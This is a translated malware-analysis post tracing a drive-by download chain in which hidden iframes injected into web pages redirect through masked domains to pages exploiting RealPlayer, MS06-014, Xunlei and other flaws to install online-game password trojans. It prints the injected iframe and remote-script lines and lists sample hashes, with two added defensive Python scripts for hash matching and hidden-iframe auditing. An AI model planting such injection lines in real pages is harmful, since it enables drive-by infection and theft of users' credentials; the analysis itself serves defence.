Websites spreading ARP viruses such as Trojan.PSW.Win32.OnlineGames.GEN

Original author: endurer
1st-

The virus injects the following code into web pages:
/---
<IFRAME src = hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/Shui **/4.htm width = 0 Height = 0> </iframe>
---/

1 hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/Shui **/4.htm contains the code:
/---
<IFRAME src = hxxp: // www. I ** mm ** M * QM. ***. CN/h.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // D * m *. 1 ** 7ti ** ng ** gieba *. CN/c2.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/10wip.htm> </iframe>
---/

1.1 hxxp: // www. I ** mm ** M * QM. ***. CN/h.htm contains the code:
/---
<IFRAME src = hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/cn3100.htm? BB? 6 width = 0 Height = 0> </iframe>
---/

1.1.1 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. ***. CN/VIP/cn3100.htm? BB? 6 includes and outputs the code:
/---
<IFRAME src = wm2/index.html width = 1 Height = 1 border = 1> </iframe>
<IFRAME Style = display: None src = "2.gif"> </iframe>
<IFRAME Style = display: None src = "8.gif"> </iframe>
<IFRAME Style = display: None src = "1.gif"> </iframe>
<IFRAME Style = display: None src = "5.gif"> </iframe>
<IFRAME Style = display: None src = "11.gif"> </iframe>
<IFRAME Style = display: None src = "4.gif"> </iframe>
<IFRAME Style = display: None src = "12.gif" width = 100 Height = 1> </iframe>
<IFRAME Style = display: None src = "2.gif"> </iframe>
---/

1.1.1.1.1 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/1.gif

Exploits the Storm video player vulnerability to download hxxp: // 20 *** 08*02*03. Se ** R ** Vice-Google. ***. CN/bf.exe
File Description: D:/test/bf.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 20:37:50
Modified on: 20:37:50
Access time: 20:38:47
Size: 7368 bytes, 7.200 KB
MD5: 194872cfd1ab7a9f7bf2c7fc27997c02
Sha1: 5cb01436d73551e0c60775a7049870bcb9fec91c
CRC32: 7c458325
Kaspersky reports Trojan-PSW.Win32.OnLineGames.ppu; Rising reports Trojan.PSW.Win32.OnlineGames.GEN.
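The file-information blocks on this page give each dropped sample's MD5, SHA-1 and CRC32. The script below is an added example (not the author's tooling) that reproduces those three values for a file in the same textual form and compares them with the hashes listed on this page for bf.exe, rl.exe and s.exe. Only the hash values and detection names are taken from the page; the function names and the comparison policy are this example's own. It treats a CRC32-only match as a weak indicator, because a 32-bit checksum is neither collision-resistant nor unique enough to identify a file.

```python
"""Fingerprint a dropped file and compare it with the hashes listed on this page."""
import hashlib
import zlib
from pathlib import Path

# Hashes copied from the file-information blocks on this page; the names in
# parentheses are the Kaspersky detections the page reports for each sample.
KNOWN_BAD = {
    "bf.exe (Trojan-PSW.Win32.OnLineGames.ppu)": {
        "md5": "194872cfd1ab7a9f7bf2c7fc27997c02",
        "sha1": "5cb01436d73551e0c60775a7049870bcb9fec91c",
        "crc32": "7c458325",
    },
    "rl.exe (Trojan-Downloader.Win32.Delf.epw)": {
        "md5": "bfaf373042d10517fdc0fe713bbeb093",
        "sha1": "ad5e17bd40a7604ea3fda5a35b372fbb5ba7df2e",
        "crc32": "b6ea58c4",
    },
    "s.exe (Trojan-Downloader.Win32.Tiny.aid)": {
        "md5": "1b27b0c37f725a140955de91c58e2266",
        "sha1": "95fe224a524ef3c0bbcf5494ddef5e86b3926db3",
        "crc32": "2c2ce980",
    },
}


def fingerprint(data: bytes) -> dict:
    """Return size, MD5, SHA-1 and CRC32 in the same textual form the page uses."""
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        # zlib.crc32 returns an unsigned value on Python 3; print it as 8 hex digits.
        "crc32": format(zlib.crc32(data), "08x"),
    }


def fingerprint_file(path: str) -> dict:
    """Convenience wrapper for a file on disk (hypothetical helper for this example)."""
    return fingerprint(Path(path).read_bytes())


def match_known_bad(data: bytes) -> list:
    """Names of the page's samples whose hashes match the given bytes.

    A CRC32 is an error-detecting checksum, not a cryptographic hash: unrelated
    files collide with probability 2^-32 and a collision can be forced on
    purpose, so a CRC32-only hit is reported separately as a weak indicator.
    """
    fp = fingerprint(data)
    hits = []
    for name, h in KNOWN_BAD.items():
        if fp["md5"] == h["md5"] and fp["sha1"] == h["sha1"]:
            hits.append(name)
        elif fp["crc32"] == h["crc32"]:
            hits.append(name + " [crc32 only, weak]")
    return hits


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        data = Path(p).read_bytes()
        print(p, fingerprint(data), match_known_bad(data) or "no match")
```

Run it as `python fingerprint.py suspicious.exe`; a strong match requires both MD5 and SHA-1 to agree, which is the level of evidence worth acting on when an AV engine has not yet named the file.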

1.1.1.1.2 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/2.gif
Exploits the MS06-014 vulnerability to download hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. ***. CN/614.exe
614.exe is identical to bf.exe.

1.1.1.1.3 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/3.gif

Exploits the QvodPlayer plug-in vulnerability to download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. ***. CN/qvod.exe
qvod.exe is identical to bf.exe.

1.1.1.1.4 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/4.gif

Uses the BaiduBar.Tool control to download hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. ***. CN/X. Cab
X.exe inside X.Cab is identical to bf.exe.

1.1.1.1.5 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/5.gif

Exploits the PPStream vulnerability to download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. ***. CN/pps.exe
pps.exe is identical to bf.exe.

1.1.1.1.6 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/6.gif contains the code:
/---
<IFRAME src = hxxp: // 20 *** 08*02*21. se * r ** Vice-Google. ***. CN/VIP/OK _ OK .htm width = 0 Height = 0 border = 0> </iframe>
---/

1.1.1.1.6.1 hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. **. CN/VIP/OK _ OK .htm contains the code:
/---
<IFRAME src = wm2/z.html width = 1 Height = 1 border = 0> </iframe>
---/

1.1.1.1.6.1.1 hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. **. CN/VIP/wm2/z.html
Its content is the same as 1.1.1.

1.1.1.1.7 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/7.gif
Same as 6.gif

1.1.1.1.8 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/8.gif

Exploits the RealPlayer vulnerability to download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. ***. CN/real.exe
real.exe is the same as 6.gif.

1.1.1.1.9 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/9.gif
Same as 6.gif

1.1.1.1.10 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/10.gif
Same as 6.gif

1.1.1.1.11 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/11.gif

Exploits the GLChat.ocx vulnerability in Lianzhong World (GLWorld) to download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. **. CN/lz3.exe
lz3.exe is identical to bf.exe.

1.1.1.1.12 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/12.gif

Exploits the Thunder (Xunlei) vulnerability to download hxxp: // 20 ** 08*02*24. Se * r ** Vice-Google. ***. CN/xl.exe
xl.exe is identical to bf.exe.

1.1.1.1.13 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/13.gif
Same as 6.gif

1.2 hxxp: // D * m *. 1 ** 7ti ** ng ** gieba *. CN/c2.htm contains the code:
/---
<IFRAME src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/6664301.htm? Id = XSL width = 100 Height = 0> </iframe>
---/

1.2.1 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/6664301.htm? Id = XSL contains code:
/---
<IFRAME srcw.htm.html width = 100 Height = 0> </iframe>
---/

1.2.1.1 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/htm.html contains and outputs the code:
/---
<IFRAME width = 100 Height = 0 src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/rl.htm> </iframe>
<SCRIPT src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/1.js> </SCRIPT>
<SCRIPT src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/bf.js> </SCRIPT>
<SCRIPT src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/pps.js> </SCRIPT>
<IFRAME width = '10' Height = '10' src = 'hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/3.htm'> </iframe>
---/
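Every stage in this chain hides its loader the same way: an iframe with width and height of 0 or 1 pixel, an iframe with `style=display:none` (as in 1.1.1), or a bare remote `<script src=...>` include (as in the htm.html page directly above). The following is an added example, not code from the original post, showing how a defender can flag those patterns when auditing a page suspected of injection. The sample HTML is constructed for this example and uses `.invalid` placeholder domains with the `hxxp` defanging the author uses; the class and function names are this example's own.

```python
"""Flag hidden <iframe> elements and remote <script> includes in an HTML page."""
from html.parser import HTMLParser

# Constructed sample modelled on the injected code on this page (defanged,
# placeholder domains). The last iframe is a normal-sized embed and must not fire.
SAMPLE_HTML = """
<p>Normal page content</p>
<IFRAME src=hxxp://example-a.invalid/shui/4.htm width=0 Height=0></iframe>
<IFRAME Style=display:None src="2.gif"></iframe>
<IFRAME src=wm2/index.html width=1 Height=1 border=1></iframe>
<SCRIPT src=hxxp://example-b.invalid/web/bf.js></SCRIPT>
<iframe src="https://video.example.invalid/embed" width="640" height="360"></iframe>
"""


class HiddenLoaderAudit(HTMLParser):
    """Collects iframes hidden by size or CSS, and every script loaded by URL."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names and strips quotes from
        # values; attributes without a value arrive as None.
        a = {k: (v or "").strip() for k, v in attrs}
        reasons = []
        if tag == "iframe":
            for dim in ("width", "height"):
                if a.get(dim, "") in ("0", "1"):
                    reasons.append(f"{dim}={a[dim]}")
            style = a.get("style", "").replace(" ", "").lower()
            if "display:none" in style:
                reasons.append("display:none")
        elif tag == "script" and a.get("src"):
            # Any externally sourced script is worth a look on a page that should
            # not load third-party code; refine with an allow-list in practice.
            reasons.append("remote script include")
        if reasons:
            self.findings.append({"tag": tag, "src": a.get("src", ""), "reasons": reasons})


def audit_html(html_text: str) -> list:
    """Return the list of suspicious tags found in html_text, in document order."""
    p = HiddenLoaderAudit()
    p.feed(html_text)
    p.close()
    return p.findings


if __name__ == "__main__":
    for f in audit_html(SAMPLE_HTML):
        print(f"{f['tag']:6} {f['src']:45} {', '.join(f['reasons'])}")
```

Run over a page fetched from a possibly compromised site (or over files in a web root during incident response), each hit gives the next URL in the chain, which is exactly how the nested numbering on this page was built up. Hidden iframes do have legitimate uses (tracking pixels, some analytics), so the output is a review list, not a verdict.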

1.2.1.1.1 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/rl.htm

Exploits the RealPlayer vulnerability to download hxxp: // exe. x * In ** Nia * NK * l.com/rl.exe

File Description: D:/test/rl.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 20:55:38
Modified on: 20:55:38
Access time: 20:56:21
Size: 23717 bytes, 23.165 KB
MD5: bfaf373042d10517fdc0fe713bbeb093
Sha1: ad5e17bd40a7604ea3fda5a35b372fbb5ba7df2e
CRC32: b6ea58c4

Kaspersky reports Trojan-Downloader.Win32.Delf.epw (nspack); Rising reports Trojan.DL.Win32.Direct.me (iftdll).

1.2.1.1.2 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/1.js

Exploits the MS06-014 vulnerability to download hxxp: // exe. x * In ** Nia * NK * l.com/014.exe
014.exe is identical to rl.exe.

1.2.1.1.3 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/bf.js

Downloads hxxp: // exe. x * In ** Nia * NK * l.com/bf.exe
bf.exe is identical to rl.exe.

1.2.1.1.4 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/pps.js

Exploits the PPS vulnerability to download hxxp: // exe. x * In ** Nia * NK * l.com/pps.exe
pps.exe is identical to rl.exe.

1.2.1.1.5 Uses the BaiduBar.Tool control to download hxxp: // exe. x * In ** Nia * NK * l.com/ad.cab
bd.exe inside ad.cab is identical to rl.exe.

1.2.1.1.6 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/3.htm

Downloads hxxp: // exe. x * In ** Nia * NK * l.com/lz.exe through the hangameplugincn18.dll (CLSID: Taobao) GLWorld ActiveX control, the main program of the Lianzhong World game hall.

lz.exe is identical to rl.exe.

1.3 hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/10wip.htm contains the code:
/---
<IFRAME src = "hxxp: // www. ** 5 ** 9 *. VC/page/add_753643.htm? 111222222 "width = 0 Height = 0> </iframe>
---/

1.3.1 hxxp: // www. ** 5 ** 9 *. VC/page/add_753643.htm? 111222222 contains code:
/---
<SCRIPT src = ADDR. js> </SCRIPT>
---/

1.3.1.1 hxxp: // www. ** 5 ** 9 *. VC/page/ADDR. js
This code is special in that it checks whether Kaspersky Internet Security 6.0 is installed on the visitor's computer.

It then outputs the code:
/---
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1 ** 8 ***. VG/baidu.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/bf.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/ms.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/real.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1 ** 8 ***. VG/lz.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/xl.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/ms.gif"> </iframe>
---/

1.3.1.1.1 hxxp: // ***. W *** 1 *** 8 ***. VG/baidu.gif

Uses the BaiduBar.Tool.1 control to download hxxp: // ***. W *** 1 *** 8 ***. VG/Calc. Cab
Calc.Cab contains s.exe.

File Description: D:/test/s.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 23:34:34
Modification time: 23:34:34
Access time:
Size: 1444 bytes, 1.420 KB
MD5: 1b27b0c37f725a140955de91c58e2266
Sha1: 95fe224a524ef3c0bbcf5494ddef5e86b3926db3
CRC32: 2c2ce980

Kaspersky reports Trojan-Downloader.Win32.Tiny.aid; Rising reports Trojan.DL.Win32.Inject.Small M (UPack 0.39).

1.3.1.1.2 hxxp: // ***. W *** 1 *** 8 ***. VG/bf.gif
The file does not exist.

1.3.1.1.3 hxxp: // ***. W *** 1 *** 8 ***. VG/ms.gif
Exploits the MS06-014 vulnerability to download hxxp: // ***. W *** 1 *** 8 ***. VG/s.exe

1.3.1.1.4 hxxp: // ***. W *** 1 *** 8 ***. VG/real.gif
Exploits the RealPlayer vulnerability to download hxxp: // ***. W *** 1 *** 8 ***. VG/s.exe

1.3.1.1.5 hxxp: // ***. W *** 1 *** 8 ***. VG/lz.gif
Exploits the Lianzhong World GLChat.ocx vulnerability (CLSID: AE93C5DF-A990-11D1-AEBD-5254ABDD2B69, _licensed_to_ = "huyufeng") to download hxxp ://***. W ** 1*8 ***. VG/s.exe

1.3.1.1.6 hxxp: // ***. W *** 1 *** 8 ***. VG/xl.gif
Exploits the Thunder Look (Xunlei Kankan) vulnerability (CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F, _licensed_to_ = "huyufeng") to download hxxp: // ***. W *** 1*8 ***. VG/s.exe

 
